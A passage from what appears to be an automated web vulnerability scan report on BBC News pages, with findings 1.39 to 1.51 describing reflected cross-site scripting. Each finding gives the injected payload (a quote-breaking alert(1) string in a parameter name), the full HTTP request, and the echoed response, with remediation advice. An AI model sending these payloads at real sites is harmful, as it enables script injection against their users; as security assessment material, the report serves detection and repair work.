<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/
...[SNIP]...
<!--
   bbc.fmtj.page = {
       serverTime: 1297476195000,
       editionToServe: 'us',
       queryString: '7d154'-alert(1)-'99e276b557c=1',
       referrer: null,
       section: 'world',
       sectionPath: '/World',
       siteName: 'BBC News',
       siteToServe: 'news',
       siteVersion: 'cream',
       storyId: '12428938',
       assetType: 'photo_gallery',

...[SNIP]...

1.39. http://www.bbc.co.uk/news/world-12434787 [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.bbc.co.uk
Path:   /news/world-12434787

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload dc470'-alert(1)-'c43afc9c799 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /news/world-12434787?dc470'-alert(1)-'c43afc9c799=1 HTTP/1.1
Host: www.bbc.co.uk
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache
Cache-Control: max-age=0
Content-Type: text/html
Date: Sat, 12 Feb 2011 02:03:20 GMT
Keep-Alive: timeout=10, max=786
Expires: Sat, 12 Feb 2011 02:03:20 GMT
Connection: close
Set-Cookie: BBC-UID=949dc5d55e4aa6088a3e6077513862ee9dacaba8a0b0f1295babd33fa31553220Mozilla%2f4%2e0%20%28compatible%3b%20MSIE%207%2e0%3b%20Windows%20NT%206%2e0%29; expires=Sun, 12-Feb-12 02:03:20 GMT; path=/; domain=bbc.co.uk;
Set-Cookie: BBC-UID=949dc5d55e4aa6088a3e6077513862ee9dacaba8a0b0f1295babd33fa31553220Mozilla%2f4%2e0%20%28compatible%3b%20MSIE%207%2e0%3b%20Windows%20NT%206%2e0%29; expires=Sun, 12-Feb-12 02:03:20 GMT; path=/; domain=bbc.co.uk;
Content-Length: 55281

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML+RDFa 1.0//EN" "http://www.w3.org/MarkUp/DTD/xhtml-rdfa-1.dtd">


<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/schema/"
...[SNIP]...
<!--
   bbc.fmtj.page = {
       serverTime: 1297476200000,
       editionToServe: 'us',
       queryString: 'dc470'-alert(1)-'c43afc9c799=1',
       referrer: null,
       section: 'world',
       sectionPath: '/World',
       siteName: 'BBC News',
       siteToServe: 'news',
       siteVersion: 'cream',
       storyId: '12434787',
       assetType: 'story',
       uri: '
...[SNIP]...

1.40. http://www.bbc.co.uk/news/world-africa-12427390 [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.bbc.co.uk
Path:   /news/world-africa-12427390

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 95ed2'-alert(1)-'4b430e1d460 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /news/world-africa-12427390?95ed2'-alert(1)-'4b430e1d460=1 HTTP/1.1
Host: www.bbc.co.uk
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache
Cache-Control: max-age=0
Content-Type: text/html
Date: Sat, 12 Feb 2011 02:03:25 GMT
Keep-Alive: timeout=10, max=774
Expires: Sat, 12 Feb 2011 02:03:25 GMT
Connection: close
Set-Cookie: BBC-UID=749d95256e3a668d1bc988927174099600ae441600d0819a24ab0ac5bb01acfa0Mozilla%2f4%2e0%20%28compatible%3b%20MSIE%207%2e0%3b%20Windows%20NT%206%2e0%29; expires=Sun, 12-Feb-12 02:03:25 GMT; path=/; domain=bbc.co.uk;
Set-Cookie: BBC-UID=749d95256e3a668d1bc988927174099600ae441600d0819a24ab0ac5bb01acfa0Mozilla%2f4%2e0%20%28compatible%3b%20MSIE%207%2e0%3b%20Windows%20NT%206%2e0%29; expires=Sun, 12-Feb-12 02:03:25 GMT; path=/; domain=bbc.co.uk;
Content-Length: 63772

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML+RDFa 1.0//EN" "http://www.w3.org/MarkUp/DTD/xhtml-rdfa-1.dtd">


<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/schema/"
...[SNIP]...
<!--
   bbc.fmtj.page = {
       serverTime: 1297476205000,
       editionToServe: 'us',
       queryString: '95ed2'-alert(1)-'4b430e1d460=1',
       referrer: null,
       section: 'africa',
       sectionPath: '/World/Africa',
       siteName: 'BBC News',
       siteToServe: 'news',
       siteVersion: 'cream',
       storyId: '12427390',
       assetType: 'story',

...[SNIP]...

1.41. http://www.bbc.co.uk/news/world-africa-12430115 [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.bbc.co.uk
Path:   /news/world-africa-12430115

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 38c3e'-alert(1)-'0c8a1f2a30e was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /news/world-africa-12430115?38c3e'-alert(1)-'0c8a1f2a30e=1 HTTP/1.1
Host: www.bbc.co.uk
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache
Cache-Control: max-age=0
Content-Type: text/html
Date: Sat, 12 Feb 2011 02:03:27 GMT
Keep-Alive: timeout=10, max=793
Expires: Sat, 12 Feb 2011 02:03:27 GMT
Connection: close
Set-Cookie: BBC-UID=f47d0515fe9a16cf381ef21151143b9d242dbe9730c0e2e3376d9af085f3faae0Mozilla%2f4%2e0%20%28compatible%3b%20MSIE%207%2e0%3b%20Windows%20NT%206%2e0%29; expires=Sun, 12-Feb-12 02:03:27 GMT; path=/; domain=bbc.co.uk;
Set-Cookie: BBC-UID=f47d0515fe9a16cf381ef21151143b9d242dbe9730c0e2e3376d9af085f3faae0Mozilla%2f4%2e0%20%28compatible%3b%20MSIE%207%2e0%3b%20Windows%20NT%206%2e0%29; expires=Sun, 12-Feb-12 02:03:27 GMT; path=/; domain=bbc.co.uk;
Content-Length: 71053

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML+RDFa 1.0//EN" "http://www.w3.org/MarkUp/DTD/xhtml-rdfa-1.dtd">


<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/schema/"
...[SNIP]...
<!--
   bbc.fmtj.page = {
       serverTime: 1297476207000,
       editionToServe: 'us',
       queryString: '38c3e'-alert(1)-'0c8a1f2a30e=1',
       referrer: null,
       section: 'africa',
       sectionPath: '/World/Africa',
       siteName: 'BBC News',
       siteToServe: 'news',
       siteVersion: 'cream',
       storyId: '12430115',
       assetType: 'story',

...[SNIP]...

1.42. http://www.bbc.co.uk/news/world-africa-12432292 [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.bbc.co.uk
Path:   /news/world-africa-12432292

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 16c63'-alert(1)-'d24de83ef09 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /news/world-africa-12432292?16c63'-alert(1)-'d24de83ef09=1 HTTP/1.1
Host: www.bbc.co.uk
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache
Cache-Control: max-age=0
Content-Type: text/html
Date: Sat, 12 Feb 2011 02:03:27 GMT
Keep-Alive: timeout=10, max=745
Expires: Sat, 12 Feb 2011 02:03:27 GMT
Connection: close
Set-Cookie: BBC-UID=94add5f54e6a564f068c88f9b123604231ae0c3dc04081dae4ebba851d908a8a0Mozilla%2f4%2e0%20%28compatible%3b%20MSIE%207%2e0%3b%20Windows%20NT%206%2e0%29; expires=Sun, 12-Feb-12 02:03:27 GMT; path=/; domain=bbc.co.uk;
Set-Cookie: BBC-UID=94add5f54e6a564f068c88f9b123604231ae0c3dc04081dae4ebba851d908a8a0Mozilla%2f4%2e0%20%28compatible%3b%20MSIE%207%2e0%3b%20Windows%20NT%206%2e0%29; expires=Sun, 12-Feb-12 02:03:27 GMT; path=/; domain=bbc.co.uk;
Content-Length: 64314

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML+RDFa 1.0//EN" "http://www.w3.org/MarkUp/DTD/xhtml-rdfa-1.dtd">


<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/schema/"
...[SNIP]...
<!--
   bbc.fmtj.page = {
       serverTime: 1297476207000,
       editionToServe: 'us',
       queryString: '16c63'-alert(1)-'d24de83ef09=1',
       referrer: null,
       section: 'africa',
       sectionPath: '/World/Africa',
       siteName: 'BBC News',
       siteToServe: 'news',
       siteVersion: 'cream',
       storyId: '12432292',
       assetType: 'story',

...[SNIP]...

1.43. http://www.bbc.co.uk/news/world-africa-12433674 [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.bbc.co.uk
Path:   /news/world-africa-12433674

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload aeb1d'-alert(1)-'58350a982a5 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /news/world-africa-12433674?aeb1d'-alert(1)-'58350a982a5=1 HTTP/1.1
Host: www.bbc.co.uk
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache
Cache-Control: max-age=0
Content-Type: text/html
Date: Sat, 12 Feb 2011 02:03:28 GMT
Keep-Alive: timeout=10, max=794
Expires: Sat, 12 Feb 2011 02:03:28 GMT
Connection: close
Set-Cookie: BBC-UID=741df5d5ee8ac77089814c33c1b2b77bfb82fdf21030c1d96b4b33af183436ac0Mozilla%2f4%2e0%20%28compatible%3b%20MSIE%207%2e0%3b%20Windows%20NT%206%2e0%29; expires=Sun, 12-Feb-12 02:03:28 GMT; path=/; domain=bbc.co.uk;
Set-Cookie: BBC-UID=741df5d5ee8ac77089814c33c1b2b77bfb82fdf21030c1d96b4b33af183436ac0Mozilla%2f4%2e0%20%28compatible%3b%20MSIE%207%2e0%3b%20Windows%20NT%206%2e0%29; expires=Sun, 12-Feb-12 02:03:28 GMT; path=/; domain=bbc.co.uk;
Content-Length: 56748

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML+RDFa 1.0//EN" "http://www.w3.org/MarkUp/DTD/xhtml-rdfa-1.dtd">


<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/schema/"
...[SNIP]...
<!--
   bbc.fmtj.page = {
       serverTime: 1297476208000,
       editionToServe: 'us',
       queryString: 'aeb1d'-alert(1)-'58350a982a5=1',
       referrer: null,
       section: 'africa',
       sectionPath: '/World/Africa',
       siteName: 'BBC News',
       siteToServe: 'news',
       siteVersion: 'cream',
       storyId: '12433674',
       assetType: 'story',

...[SNIP]...

1.44. http://www.bbc.co.uk/news/world-asia-pacific-12427423 [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.bbc.co.uk
Path:   /news/world-asia-pacific-12427423

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload b8ce0'-alert(1)-'706f0236c3d was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /news/world-asia-pacific-12427423?b8ce0'-alert(1)-'706f0236c3d=1 HTTP/1.1
Host: www.bbc.co.uk
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache
Cache-Control: max-age=0
Content-Type: text/html
Date: Sat, 12 Feb 2011 02:03:28 GMT
Keep-Alive: timeout=10, max=800
Expires: Sat, 12 Feb 2011 02:03:28 GMT
Connection: close
Set-Cookie: BBC-UID=649d85853e6a47b0fa8316b75100024ae18ea37660b051e91bcbf3bea8ed339a0Mozilla%2f4%2e0%20%28compatible%3b%20MSIE%207%2e0%3b%20Windows%20NT%206%2e0%29; expires=Sun, 12-Feb-12 02:03:28 GMT; path=/; domain=bbc.co.uk;
Set-Cookie: BBC-UID=649d85853e6a47b0fa8316b75100024ae18ea37660b051e91bcbf3bea8ed339a0Mozilla%2f4%2e0%20%28compatible%3b%20MSIE%207%2e0%3b%20Windows%20NT%206%2e0%29; expires=Sun, 12-Feb-12 02:03:28 GMT; path=/; domain=bbc.co.uk;
Content-Length: 58774

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML+RDFa 1.0//EN" "http://www.w3.org/MarkUp/DTD/xhtml-rdfa-1.dtd">


<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/schema/"
...[SNIP]...
<!--
   bbc.fmtj.page = {
       serverTime: 1297476208000,
       editionToServe: 'us',
       queryString: 'b8ce0'-alert(1)-'706f0236c3d=1',
       referrer: null,
       section: 'asia-pacific',
       sectionPath: '/World/Asia Pacific',
       siteName: 'BBC News',
       siteToServe: 'news',
       siteVersion: 'cream',
       storyId: '12427423',
       assetType
...[SNIP]...

1.45. http://www.bbc.co.uk/news/world-asia-pacific-12428385 [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.bbc.co.uk
Path:   /news/world-asia-pacific-12428385

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 3c2e1'-alert(1)-'f0bdaf6beca was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /news/world-asia-pacific-12428385?3c2e1'-alert(1)-'f0bdaf6beca=1 HTTP/1.1
Host: www.bbc.co.uk
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache
Cache-Control: max-age=0
Content-Type: text/html
Date: Sat, 12 Feb 2011 02:03:29 GMT
Keep-Alive: timeout=10, max=781
Expires: Sat, 12 Feb 2011 02:03:29 GMT
Connection: close
Set-Cookie: BBC-UID=b48d05f5ce2a07510a668c57717d413f81f00306700041ba74dbaac5ff11cc060Mozilla%2f4%2e0%20%28compatible%3b%20MSIE%207%2e0%3b%20Windows%20NT%206%2e0%29; expires=Sun, 12-Feb-12 02:03:29 GMT; path=/; domain=bbc.co.uk;
Set-Cookie: BBC-UID=b48d05f5ce2a07510a668c57717d413f81f00306700041ba74dbaac5ff11cc060Mozilla%2f4%2e0%20%28compatible%3b%20MSIE%207%2e0%3b%20Windows%20NT%206%2e0%29; expires=Sun, 12-Feb-12 02:03:29 GMT; path=/; domain=bbc.co.uk;
Content-Length: 59031

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML+RDFa 1.0//EN" "http://www.w3.org/MarkUp/DTD/xhtml-rdfa-1.dtd">


<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/schema/"
...[SNIP]...
<!--
   bbc.fmtj.page = {
       serverTime: 1297476209000,
       editionToServe: 'us',
       queryString: '3c2e1'-alert(1)-'f0bdaf6beca=1',
       referrer: null,
       section: 'asia-pacific',
       sectionPath: '/World/Asia Pacific',
       siteName: 'BBC News',
       siteToServe: 'news',
       siteVersion: 'cream',
       storyId: '12428385',
       assetType
...[SNIP]...

1.46. http://www.bbc.co.uk/news/world-asia-pacific-12430671 [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.bbc.co.uk
Path:   /news/world-asia-pacific-12430671

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload f5c5e'-alert(1)-'980ebdc7983 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /news/world-asia-pacific-12430671?f5c5e'-alert(1)-'980ebdc7983=1 HTTP/1.1
Host: www.bbc.co.uk
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache
Cache-Control: max-age=0
Content-Type: text/html
Date: Sat, 12 Feb 2011 02:03:29 GMT
Keep-Alive: timeout=10, max=772
Expires: Sat, 12 Feb 2011 02:03:29 GMT
Connection: close
Set-Cookie: BBC-UID=b4bd15f5ae5a87215a38df0cb10bf2e9f4dda6ad3070a1f96b3be29ccd058fbc0Mozilla%2f4%2e0%20%28compatible%3b%20MSIE%207%2e0%3b%20Windows%20NT%206%2e0%29; expires=Sun, 12-Feb-12 02:03:29 GMT; path=/; domain=bbc.co.uk;
Set-Cookie: BBC-UID=b4bd15f5ae5a87215a38df0cb10bf2e9f4dda6ad3070a1f96b3be29ccd058fbc0Mozilla%2f4%2e0%20%28compatible%3b%20MSIE%207%2e0%3b%20Windows%20NT%206%2e0%29; expires=Sun, 12-Feb-12 02:03:29 GMT; path=/; domain=bbc.co.uk;
Content-Length: 60087

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML+RDFa 1.0//EN" "http://www.w3.org/MarkUp/DTD/xhtml-rdfa-1.dtd">


<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/schema/"
...[SNIP]...
<!--
   bbc.fmtj.page = {
       serverTime: 1297476209000,
       editionToServe: 'us',
       queryString: 'f5c5e'-alert(1)-'980ebdc7983=1',
       referrer: null,
       section: 'asia-pacific',
       sectionPath: '/World/Asia Pacific',
       siteName: 'BBC News',
       siteToServe: 'news',
       siteVersion: 'cream',
       storyId: '12430671',
       assetType
...[SNIP]...

1.47. http://www.bbc.co.uk/news/world-middle-east-12435798 [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.bbc.co.uk
Path:   /news/world-middle-east-12435798

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 4188e'-alert(1)-'574fa93ae16 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /news/world-middle-east-12435798?4188e'-alert(1)-'574fa93ae16=1 HTTP/1.1
Host: www.bbc.co.uk
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache
Cache-Control: max-age=0
Content-Type: text/html
Date: Sat, 12 Feb 2011 02:03:36 GMT
Keep-Alive: timeout=10, max=673
Expires: Sat, 12 Feb 2011 02:03:36 GMT
Connection: close
Set-Cookie: BBC-UID=84adb5051e3ae7786bd93c17e1dab7c6f118965fc0f0a10a04fb3a058b610cca0Mozilla%2f4%2e0%20%28compatible%3b%20MSIE%207%2e0%3b%20Windows%20NT%206%2e0%29; expires=Sun, 12-Feb-12 02:03:36 GMT; path=/; domain=bbc.co.uk;
Set-Cookie: BBC-UID=84adb5051e3ae7786bd93c17e1dab7c6f118965fc0f0a10a04fb3a058b610cca0Mozilla%2f4%2e0%20%28compatible%3b%20MSIE%207%2e0%3b%20Windows%20NT%206%2e0%29; expires=Sun, 12-Feb-12 02:03:36 GMT; path=/; domain=bbc.co.uk;
Content-Length: 72057

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML+RDFa 1.0//EN" "http://www.w3.org/MarkUp/DTD/xhtml-rdfa-1.dtd">


<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/schema/"
...[SNIP]...
<!--
   bbc.fmtj.page = {
       serverTime: 1297476216000,
       editionToServe: 'us',
       queryString: '4188e'-alert(1)-'574fa93ae16=1',
       referrer: null,
       section: 'middle-east',
       sectionPath: '/World/Middle East',
       siteName: 'BBC News',
       siteToServe: 'news',
       siteVersion: 'cream',
       storyId: '12435798',
       assetType:
...[SNIP]...

1.48. http://www.bbc.co.uk/news/world-middle-east-12437440 [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.bbc.co.uk
Path:   /news/world-middle-east-12437440

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 7200c'-alert(1)-'19377c14f7c was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /news/world-middle-east-12437440?7200c'-alert(1)-'19377c14f7c=1 HTTP/1.1
Host: www.bbc.co.uk
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache
Cache-Control: max-age=0
Content-Type: text/html
Date: Sat, 12 Feb 2011 02:03:35 GMT
Keep-Alive: timeout=10, max=796
Expires: Sat, 12 Feb 2011 02:03:35 GMT
Connection: close
Set-Cookie: BBC-UID=943df555ae8aa707eb944acaf10f529ad76627861000d1999b1b320aaf119f480Mozilla%2f4%2e0%20%28compatible%3b%20MSIE%207%2e0%3b%20Windows%20NT%206%2e0%29; expires=Sun, 12-Feb-12 02:03:35 GMT; path=/; domain=bbc.co.uk;
Set-Cookie: BBC-UID=943df555ae8aa707eb944acaf10f529ad76627861000d1999b1b320aaf119f480Mozilla%2f4%2e0%20%28compatible%3b%20MSIE%207%2e0%3b%20Windows%20NT%206%2e0%29; expires=Sun, 12-Feb-12 02:03:35 GMT; path=/; domain=bbc.co.uk;
Content-Length: 61160

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML+RDFa 1.0//EN" "http://www.w3.org/MarkUp/DTD/xhtml-rdfa-1.dtd">


<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/schema/"
...[SNIP]...
<!--
   bbc.fmtj.page = {
       serverTime: 1297476215000,
       editionToServe: 'us',
       queryString: '7200c'-alert(1)-'19377c14f7c=1',
       referrer: null,
       section: 'middle-east',
       sectionPath: '/World/Middle East',
       siteName: 'BBC News',
       siteToServe: 'news',
       siteVersion: 'cream',
       storyId: '12437440',
       assetType:
...[SNIP]...

1.49. http://www.bbc.co.uk/news/world-middle-east-12437881 [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.bbc.co.uk
Path:   /news/world-middle-east-12437881

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 52c19'-alert(1)-'2a417e9ef2e was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /news/world-middle-east-12437881?52c19'-alert(1)-'2a417e9ef2e=1 HTTP/1.1
Host: www.bbc.co.uk
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache
Cache-Control: max-age=0
Content-Type: text/html
Date: Sat, 12 Feb 2011 02:03:36 GMT
Keep-Alive: timeout=10, max=785
Expires: Sat, 12 Feb 2011 02:03:36 GMT
Connection: close
Set-Cookie: BBC-UID=543d65255eca9708dbdb3077416207980e855604603081fad4fbfa74c2bc94500Mozilla%2f4%2e0%20%28compatible%3b%20MSIE%207%2e0%3b%20Windows%20NT%206%2e0%29; expires=Sun, 12-Feb-12 02:03:36 GMT; path=/; domain=bbc.co.uk;
Set-Cookie: BBC-UID=543d65255eca9708dbdb3077416207980e855604603081fad4fbfa74c2bc94500Mozilla%2f4%2e0%20%28compatible%3b%20MSIE%207%2e0%3b%20Windows%20NT%206%2e0%29; expires=Sun, 12-Feb-12 02:03:36 GMT; path=/; domain=bbc.co.uk;
Content-Length: 61326

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML+RDFa 1.0//EN" "http://www.w3.org/MarkUp/DTD/xhtml-rdfa-1.dtd">


<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/schema/"
...[SNIP]...
<!--
   bbc.fmtj.page = {
       serverTime: 1297476216000,
       editionToServe: 'us',
       queryString: '52c19'-alert(1)-'2a417e9ef2e=1',
       referrer: null,
       section: 'middle-east',
       sectionPath: '/World/Middle East',
       siteName: 'BBC News',
       siteToServe: 'news',
       siteVersion: 'cream',
       storyId: '12437881',
       assetType:
...[SNIP]...

1.50. http://www.bbc.co.uk/news/world-middle-east-12437912 [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.bbc.co.uk
Path:   /news/world-middle-east-12437912

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 4b489'-alert(1)-'c694ea9bbf5 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /news/world-middle-east-12437912?4b489'-alert(1)-'c694ea9bbf5=1 HTTP/1.1
Host: www.bbc.co.uk
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache
Cache-Control: max-age=0
Content-Type: text/html
Date: Sat, 12 Feb 2011 02:03:35 GMT
Keep-Alive: timeout=10, max=717
Expires: Sat, 12 Feb 2011 02:03:35 GMT
Connection: close
Set-Cookie: BBC-UID=94ddc595ee9a47773a0e32f9e1e386b9efaa290f30c041691b7be3eee0ce249c0Mozilla%2f4%2e0%20%28compatible%3b%20MSIE%207%2e0%3b%20Windows%20NT%206%2e0%29; expires=Sun, 12-Feb-12 02:03:35 GMT; path=/; domain=bbc.co.uk;
Set-Cookie: BBC-UID=94ddc595ee9a47773a0e32f9e1e386b9efaa290f30c041691b7be3eee0ce249c0Mozilla%2f4%2e0%20%28compatible%3b%20MSIE%207%2e0%3b%20Windows%20NT%206%2e0%29; expires=Sun, 12-Feb-12 02:03:35 GMT; path=/; domain=bbc.co.uk;
Content-Length: 61266

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML+RDFa 1.0//EN" "http://www.w3.org/MarkUp/DTD/xhtml-rdfa-1.dtd">


<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/schema/"
...[SNIP]...
<!--
   bbc.fmtj.page = {
       serverTime: 1297476215000,
       editionToServe: 'us',
       queryString: '4b489'-alert(1)-'c694ea9bbf5=1',
       referrer: null,
       section: 'middle-east',
       sectionPath: '/World/Middle East',
       siteName: 'BBC News',
       siteToServe: 'news',
       siteVersion: 'cream',
       storyId: '12437912',
       assetType:
...[SNIP]...

1.51. http://www.bbc.co.uk/news/world-middle-east-12437922 [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.bbc.co.uk
Path:   /news/world-middle-east-12437922

Issue detail

